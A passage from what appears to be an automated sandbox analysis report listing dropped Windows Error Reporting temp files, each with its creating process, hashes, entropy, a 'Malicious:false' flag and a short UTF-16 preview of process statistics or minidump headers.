                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DD4.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.7012194766689315
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWsybsp0YmYfkTRHkiYEZ2ntFiC7lFVwO5AazHxgMOkVI820:2ZDhxydOazH2MOkq820
                                                                                                                                                                    MD5:8E800DBCC0BC2E66CCE16731E6C0A4DA
                                                                                                                                                                    SHA1:B1B6A0BA010173CD1E0239E4A093F08428FEC632
                                                                                                                                                                    SHA-256:21E1BBBF2FA3E3EAF2F988961EEEEEC65A5893E7E6FFC840AFDD1987218F8DCE
                                                                                                                                                                    SHA-512:A5A750A35A4D7CD84FAAC4AA8709DA02342848414185F5785322692FFCA24C1EAFFA8A42DD9A33D81C3BBA026A87EC56B08DF03CAB5D75AF4EC531253979BE94
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER803.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93772
                                                                                                                                                                    Entropy (8bit):3.0512739845266985
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:97uPoMhPdfLpRBbOPz3LXQvX0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kE:97uPoMhPdfLpRBbOPz3LXQv0n+sI+E+9
                                                                                                                                                                    MD5:279B847F4227E56AE79D8A488E7377D5
                                                                                                                                                                    SHA1:B13613B562A817AC482A8D1D585530B22834D41A
                                                                                                                                                                    SHA-256:A97298EC12ED1090154206949D8E929F77D78A7E98706CDF7596D85B6F6A6299
                                                                                                                                                                    SHA-512:86916A932CD0F3F108FFB8BA07BBBC614632E8113DEB2EEC7A4AFC94C2DC80CD49473477790587D101CA40A0929FCB03BB0BDCFE081FFBBCB1EA5489A4A78058
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8196.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90510
                                                                                                                                                                    Entropy (8bit):3.0556955613422176
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:cLxefrDdlVrAehRQsT67wZiw20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+3:cLxefrDdlVrAehRQsT67wZD20n+sI+Ec
                                                                                                                                                                    MD5:904E6B48F19D933A7D4D616B0589A9EF
                                                                                                                                                                    SHA1:6DBE02A0258B5A55B4DB99F432B2FCF472865776
                                                                                                                                                                    SHA-256:5A4C4F548AE931789D3D638F5C25A14B1563321CCDE640A11766DC46552CD7E2
                                                                                                                                                                    SHA-512:D118C7E6981CB4021C40FD1A37DEAB5E13C733508344BF582C0C68BD06A85C8D702EA5CFEF70AFFEAE38F2D6F5A3EFE37AF358CD8B2771808C890F6337785654
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER83CA.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6867349475995073
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW1HJA27mWYxdYzmWoHuYEZWmtFiE7K/aw/ymaBTxMZH7Iyv3:2ZDJBMd7blaBTxMZH0yv3
                                                                                                                                                                    MD5:771E925EE93FBB35B7F637BD588C14E5
                                                                                                                                                                    SHA1:164F34118F4B896FD286EC5F2585A5E276227E44
                                                                                                                                                                    SHA-256:E68B03D3BBF1C112624FEEDD0A5B6054813F71F2DA5D435D7C7F35E7E9F564F2
                                                                                                                                                                    SHA-512:A888D10ECFED3BD965C27A8659D20A5CD716A4A75F04EFEC25E9A469A66829D79BB281CC0B099B05B6F76486B7B218C785996B815E78F5B423B249C047A57106
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B6.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90526
                                                                                                                                                                    Entropy (8bit):3.0554924938709123
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:KcUkrDdlVrAekRQJL68wZiY20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kj:KcUkrDdlVrAekRQJL68wZL20n+sI+E+m
                                                                                                                                                                    MD5:A5604386976B535FBB3BF4F606DC8941
                                                                                                                                                                    SHA1:A540BE6BFCA4F9A4A725D1A7C1C440FEEEB9AA89
                                                                                                                                                                    SHA-256:6FA0E95356AFB021B597CC13AF62251D60618E9D12E69ED4F5420602E8834F0C
                                                                                                                                                                    SHA-512:0621A32DE88912936C5F0FF825E19F65AC161B35D79D0EAE4A97E4BB16F6C9935D83E73A6235856A68BD9DC96049B1752D2B2F36F58F7936428164842C812433
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DEE.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6870094657834103
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWh24F9xYUYBKWbHGYEZyRtFie7Z/TwC5haDTdMrMwH/I4v3:2ZDhnDe7faDTWrMwHQ4v3
                                                                                                                                                                    MD5:D0163230B75686ED1C3C11B08F2D4CA4
                                                                                                                                                                    SHA1:E66B13537A0D8C8D97DC4595EB1DFFECBC6DDE05
                                                                                                                                                                    SHA-256:AA9007753E803322801EDE11A04ABD6EC8C347E30B113C703739BC546E718874
                                                                                                                                                                    SHA-512:13D6F4E9F84F4558BA3EACE3B84A01FD13A07655952C6F120F8AC3F3DA88AA3C885002AB3D9BAA579A252C970A902A45A7EB29491DB752C780C37BD5F302972F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E4B.tmp.dmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Thu Feb 8 18:08:57 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):96564
                                                                                                                                                                    Entropy (8bit):2.1713621659441866
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:pmBhOvB0ymZMSfe1HZVP04BLHhGD4YkXIBciSQI6UL1u0B0n3Lhv6lRXbgNVhNO2:kBUvBPmm1/Fw4PX+SQTUNShic
                                                                                                                                                                    MD5:9421C6D42C94627311870C4820014685
                                                                                                                                                                    SHA1:09FE80CB346AB9861991F2FDC6620AC9CF26EBBD
                                                                                                                                                                    SHA-256:B4E139342D402C76137A57F3FCBB0517FFA59B554383B495F4E7286614872067
                                                                                                                                                                    SHA-512:A466FD17D91A43DFB70C238548850459D0DFA2507E6195C0775DF1EB53712EDA0472A0B7A0986BB759E3C82B6AC61B97E445FF7C663957280130481695BB1ADE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP..a..... ..........e............T...............h.......T...$............8..........`.......8...........T............7...A..........x...........d...............................................................................eJ..............GenuineIntel............T..............e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9025.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92500
                                                                                                                                                                    Entropy (8bit):3.0519090641122837
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:m1GFqk8C60D1ztDWdHTZHKHQR0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+0+H:m1GFqk8C60D1ztDWdHTZHKwR0n+sI+ES
                                                                                                                                                                    MD5:E29CDB06B66A12E97F83FEBE61502162
                                                                                                                                                                    SHA1:3919A945EA56E4588DD0B36119807338423AA64F
                                                                                                                                                                    SHA-256:E65FE71D987378A3DD8830DAB8C8D3149716F2E7DB4A45B0C8E2D658D074B036
                                                                                                                                                                    SHA-512:52313FF6AD420DBEA1598454A97C8E14D54FDB0ADEF5AD34509C4F296E61CE6DDAD8209A51CCC38F11D1214A5D7114A03E13CD149296E68760DD5CDEE5AC2A62
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER916E.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.701042221836166
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWNw8ne2tHd5YQYNkzHkiYEZmldftFi37wFUTwlIkwanHuVMMPkfIj20:2ZDN/95nW/tbwanHueMPkwj20
                                                                                                                                                                    MD5:FB9A05072A15467740AE1106353DC012
                                                                                                                                                                    SHA1:C1D9ACFD53887007860A435388835204C8DF43F7
                                                                                                                                                                    SHA-256:254F66ACFA40F060CC2C837F93F2BA51C71A720ED5F897B3A20D43603AB1FC2D
                                                                                                                                                                    SHA-512:B05FAFCCCB7FD239034CDA23CC7E54C9EFDAF915871B037ACF6DB0AA59D1ABC9CD2620881FE2DA13505A7DFD223002A69ED17053B70C76D3953EDE99BDB6784C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER92C1.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):91180
                                                                                                                                                                    Entropy (8bit):3.0545980638343107
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:mG1qLrrdI4JAYiTTQJHD6YwZiY20n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+i:mG1qLrrdI4JAYiTTQJHD6YwZL20n+sIP
                                                                                                                                                                    MD5:203F8849CF34D349A26C5329D8EABB13
                                                                                                                                                                    SHA1:AA4FCFA1AFF693267A77C824F133982F7DA6D881
                                                                                                                                                                    SHA-256:781D6694469802E5BC61AE2A561B50795E03D747EFD4960E28B4D0C164337191
                                                                                                                                                                    SHA-512:3E85BE0C3AAC3F7E51EAF47B2E8FAFF54B2EFE523AB7DB6FFC8A35F13448596C5CB792AD18F4E47550F7078EFF94284FCFC56D6FE77991C44EF273A08E572A0F
                                                                                                                                                                    Malicious:false
